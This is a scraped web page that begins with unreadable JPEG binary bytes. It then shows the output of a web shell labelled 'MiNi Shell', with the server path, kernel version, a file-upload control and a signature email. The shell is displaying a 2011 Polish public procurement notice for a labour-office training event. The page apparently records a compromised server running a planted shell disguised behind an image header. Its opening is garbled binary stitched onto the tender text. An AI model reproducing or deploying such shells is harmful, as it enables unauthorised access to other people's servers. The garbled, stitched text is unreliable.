JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110415/116605-N-2011.html

<p class="kh_header"><b>Katowice: ZORGANIZOWANIE I PRZEPROWADZENIE SZKOLENIA Z ZAKRESU ZASAD REALIZACJI PROJEKTÓW  W RAMACH PO KL</b><br>
<b>Numer ogłoszenia: 116605 - 2011; data zamieszczenia: 15.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZORGANIZOWANIE I PRZEPROWADZENIE SZKOLENIA Z ZAKRESU ZASAD REALIZACJI PROJEKTÓW  W RAMACH PO KL.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu i przeprowadzeniu  dwudniowego szkolenia wyjazdowego w terminie 26-27 maja 2011 r. z zakresu Zasady realizacji projektów w ramach PO KL na podstawie dokumentów programowych i obowiązujących przepisów z uwzględnieniem najczęściej popełnianych błędów. 
W szkoleniu udział wezmą dyrektorzy powiatowych urzędów pracy oraz kierownictwo  Wojewódzkiego Urzędu Pracy w Katowicach.
Szkolenie ma zostać przeprowadzone i zorganizowane na terenie woj. śląskiego: w regionie Podbeskidzia lub Jury Krakowsko-Częstochowskiej, w hotelu o standardzie co najmniej trzygwiazdkowym lub obiekcie hotelarskim spełniającym standardy hotelu co najmniej trzygwiazdkowego. 
Celem szkolenia jest zapoznanie uczestników szkolenia z zasadami realizacji projektów 
w ramach PO KL na podstawie dokumentów programowych z uwzględnieniem obowiązujących od 1 stycznia 2011 r. przepisów oraz najczęściej popełnianych błędów w trakcie realizacji projektów. 
Zakres merytoryczny szkolenia powinien być dostosowany do potrzeb uczestników szkolenia.
Podczas szkolenia mają zostać omówione następujące panele tematyczne:
1.	Obowiązujące przepisy prawne dotyczące realizacji projektów w ramach PO KL, zgodnie ze zmianami obowiązującymi od 1 stycznia 2011 r. oraz omówienie najważniejszych zmian wprowadzonych od 1 stycznia 2011 r. do Wytycznych w zakresie kwalifikowalności wydatków w ramach PO KL:
1)	przejrzystość i konkurencyjność wydatków,
2)	zasada efektywnego zarządzania finansami,
3)	koszty pośrednie projektu,
4)	reguła proporcjonalności,
5)	stawki jednostkowe w projekcie.
 
2.	Omówienie najważniejszych zmian w Zasadach finansowania PO KL:
    1)	zarządzanie projektem,
    2)	zlecanie zadań merytorycznych,
1)	cross financing.
 
3. Zatrudnianie personelu w projekcie w świetle nowych Zasad finansowania PO KL oraz  Wytycznych w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki.
4. Podsumowanie zmian, które dotyczą wyłącznie wniosków o dofinansowanie składanych 
po 1 stycznia 2011 r. oraz zmian dotyczących wszystkich beneficjentów realizujących projekty PO KL.
5.	Przygotowanie wniosku o płatność wraz z wymaganymi załącznikami, w szczególności 
w aspekcie zmian od 1 stycznia 2011 r.

6.	Omówienie najczęściej popełnianych błędów w trakcie realizacji projektów PO KL oraz możliwość zapobiegania ich powstawaniu.

7.	Sprawozdawczość: 
1)	Dokumenty określające zasady sprawozdawczości projektów, 
2)	Ogólne zasady sprawozdawczości w ramach Programu Operacyjnego Kapitał Ludzki, 
3)	Poziomy sprawozdawczości - projekt, 
4)	Zakres przedmiotowy i terminy sprawozdawczości, 
5)	Schemat procesu sprawozdawczości w PO KL, system SIMIK. 

8.	Kontrola: 
1)	Instytucje uprawnione do przeprowadzania kontroli,
2)	Zasady,  rodzaje i zakres kontroli.

9.	Zasady tworzenia dokumentacji projektowej (opisywanie dokumentów, archiwizowanie).

10.	Konsultacje z wykładowcą.

Przewidywana liczba uczestników szkolenia - 37 osób.
Ostateczna ilość osób biorących udział w szkoleniu zostanie podana nie później niż na trzy dni kalendarzowe przed planowanym terminem szkolenia, przy czym minimalna liczba uczestników szkolenia nie będzie mniejsza niż 32 osoby.

Wykonawca w ramach usługi powinien: 
-	dysponować co najmniej jedną osobą wskazaną jako wykładowca, która przeprowadziła co najmniej 2 szkolenia  w zakresie realizacji projektów w ramach PO KL. 
-	dysponować co najmniej 37 miejscami - pokojami jednoosobowymi w hotelu 
o standardzie co najmniej trzygwiazdkowym lub obiekcie hotelarskim spełniającym standardy  hotelu co najmniej trzygwiazdkowego oraz jedną salą wykładową mieszczącą co najmniej 40 osób wraz z niezbędnym wyposażeniem i bezpłatnymi miejscami parkingowymi, 
-	przygotować dla każdego uczestnika materiały szkoleniowe składające się z: teczki, notesu, długopisu, prezentacji szkolenia w formie papierowej i elektronicznej;
-	wydać każdemu uczestnikowi imienny certyfikat potwierdzający udział w szkoleniu, zgodnie z listą obecności.
Płatność za usługę nastąpi po zorganizowaniu i przeprowadzeniu szkolenia, przy czym koszt będzie uzależniony od rzeczywistej liczby uczestników, zgłoszonych na 3 dni przed terminem szkolenia.
Szkolenie finansowane jest ze środków Funduszu Pracy 2011 r.

Na usługę zorganizowania i przeprowadzenia szkolenia składają się usługi:
1)	szkoleniowa - dla grupy składającej się z 37 osób. Ostateczna ilość osób biorących udział w szkoleniu zostanie podana nie później niż na trzy dni kalendarzowe przed planowanym terminem szkolenia, przy czym minimalna liczba uczestników szkolenia nie będzie mniejsza niż 32 osoby.
Szkolenie trwać będzie 16 godzin szkoleniowych, przy czym godzina szkoleniowa wynosi 45 minut. Ponadto szkolenie przeprowadzone zostanie w sali konferencyjnej przygotowanej w układzie bankietowym mieszczącej co najmniej 40 osób i zlokalizowanej w miejscu zakwaterowania uczestników. Sala wyposażona powinna być w sprzęt niezbędny do przeprowadzenia szkolenia, w tym: laptop, rzutnik multimedialny, ekran oraz tablicę typu flipchart oraz nagłośnienie. 
Szkolenie poprowadzi Wykładowca, który przeprowadził co najmniej 2 szkolenia  
w zakresie zasad dotyczących realizacji projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Wykładowca przeprowadzi szkolenie zgodnie z harmonogramem szkolenia, uwzględniającym zakres merytoryczny i zagadnienia, przedstawione przez Zamawiającego w niniejszym Rozdziale. Harmonogram szkolenia powinien zostać przedstawiony Zamawiającemu najpóźniej w dniu zawarcia umowy. Zajęcia powinny odbyć się z wykorzystaniem prezentacji multimedialnych.
2)	hotelarskie - zakwaterowanie każdego z uczestników szkolenia w pokojach jednoosobowych, przy czym pokoje powinny mieć powierzchnię min. 10 m2 każdy. Minimalne wyposażenie pokoi: łóżko, nocny stolik lub półka przy każdym miejscu do spania, szafa lub zabudowana wnęka garderobiana, biurko lub stół, krzesło lub inny mebel do siedzenia (nie mniej niż 2 na pokój), lustro, wieszak na okrycie wierzchnie, telewizor. Wszystkie pokoje powinny posiadać łazienki wyposażone min. w: wannę z baterią i natryskiem lub kabinę natryskową, umywalkę z blatem lub półką, WC, mydło i żel pod prysznic, zestaw ręczników.

3)	restauracyjne - pełne wyżywienie dla każdego uczestnika - świadczenie usług rozpocznie się od przerwy kawowej wraz z bufetem kanapkowym, a zakończy obiadem w drugim dniu pobytu. 

Śniadanie, obiady i kolacja powinny być podawane na zastawie ceramicznej 
z kompletem sztućców metalowych i serwetek w innej sali niż sala wykładowa, w tym dla każdego uczestnika szkolenia: 
a)	1 (jedno) śniadanie w formie szwedzkiego bufetu, w tym co najmniej:
-	pieczywo różnorodne, 
-	danie na ciepło: jajecznica, kiełbaski na gorąco,
-	wędliny różnorodne,
-	sery różnorodne: żółte, pleśniowe, białe,
-	dżemy,
-	mleko: ciepłe, zimne,
-	przetwory jogurtowe, 
-	płatki śniadaniowe,
-	świeże warzywa: pomidory, ogórek zielony,
-	napoje różnorodne: kawa, herbata, soki owocowe (0,33l os.), woda mineralna gazowana i niegazowana (033l os.),
-	dodatki: cytryna, cukier, mleko, masło, margaryna.
b)	2 (dwa) obiady, w tym każdy składający się z: 
-	zupy,
-	dania głównego (mięsne z dodatkiem ziemniaków lub ryżu i zestawu surówek),
-	napojów: kawa, herbata, soki owocowe (0,33l os.), woda mineralna gazowana 
i niegazowana (033l os.),
-	dodatków: cytryna, cukier, mleko.
Wszystkie składniki obiadu podawanego pierwszego dnia szkolenia powinny być różne od składników obiadu podawanego w drugim dniu szkolenia. Obiad 
dla każdego uczestnika powinien być podany na ciepło i może być dostarczony jako wyporcjowany lub porcjowanie może odbywać się w chwili podawania obiadu. 
c)	3 (trzy) przerwy kawowe: dwie przerwy w pierwszym dniu szkolenia, oraz jedna 
w drugim dniu szkolenia:

-	przerwa pierwsza składająca się z: 
-	kanapek z szynką, łososiem, na białym pieczywie - po 2 każdego rodzaju przypadające na jedną osobę, rogalików z nadzieniem nie mniej niż 40 g na osobę,
-	napojów: kawa, herbata, soki owocowe (0,33 l os.), woda mineralna gazowana i niegazowana (033l os.),
-	dodatków: cytryna, cukier, mleko;
-	druga przerwa kawowa składająca się z:
-	wyrobów cukierniczych różnorodnych: kruche ciasteczka, wafelki, rogaliki
z nadzieniem (nie mniej niż 40g na osobę z każdego rodzaju),
-	napojów: kawa, herbata, soki owocowe (0,33 l os.), woda mineralna gazowana i niegazowana (033l os.),
-	dodatków: cytryna, cukier, mleko.
-	trzecia przerwa kawowa składająca się z:  
-	wyrobów cukierniczych różnorodnych: kruche ciasteczka, wafelki, rogaliki
 	z nadzieniem (nie mniej niż 40g na osobę z każdego rodzaju),
-	napojów: kawa, herbata, soki owocowe (0,33l os.), woda mineralna gazowana i niegazowana (033l os.),
-	dodatków: cytryna, cukier, mleko.
d)	1 (jedna) kolacja składająca się z:
-	dania głównego podanego na ciepło,
- zimnej płyty składającej się z różnorodnych: wędlin, serów, warzyw marynowanych, śledzi, 3 rodzajów sałatek w tym: grecka, z kurczakiem, 
z tuńczykiem,
-	napojów: kawa, herbata, soki owocowe (0,33l os.), woda mineralna gazowana i niegazowana (033 l os.),
-	dodatków: cytryna, cukier, mleko.
Wszystkie składniki kolacji powinny być różne od składników obiadów podawanych podczas dwóch dni szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 26.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww warunku, jeżeli Wykonawca wykaże, iż 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie 2 usługi o wartości nie mniejszej niż 15 000 zł każda, których przedmiotem było zorganizowanie i przeprowadzenie szkolenia.

Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia ww warunku według formuły spełnia nie spełnia na podstawie załączonego do oferty wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy 
i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie (np. referencje). Nie wykazanie spełnienia ww warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww warunku, jeżeli Wykonawca wykaże, iż dysponuje co najmniej 1 osobą wskazaną jako wykładowca do realizacji zamówienia, legitymującą się przeprowadzeniem co najmniej dwóch szkoleń  z zakresu realizacji projektów w ramach PO KL. Zamawiający uzna za spełnienie ww wymogu jeżeli zakres tematyczny szkolenia ŁĄCZNIE obejmował co najmniej: obowiązujące przepisy dotyczące realizacji projektów w ramach PO KL, zasady finansowania PO KL, zasady prawidłowego wypełniania wniosków o płatność, najczęściej popełniane błędy w trakcie realizacji projektów PO KL.


Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia ww warunku według formuły spełnia nie spełnia na podstawie załączonego do oferty wykazu osób uczestniczących w realizacji zamówienia wraz z informacjami na temat ich doświadczenia zawodowego niezbędnego do wykonania zamówienia oraz z podaniem zagadnień omawianych w trakcie zrealizowanych szkoleń i 
informacją o podstawie do dysponowania tymi osobami. 

Nie wykazanie spełnienia ww warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 305, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2011 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 210- Kancelaria Urzędu, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com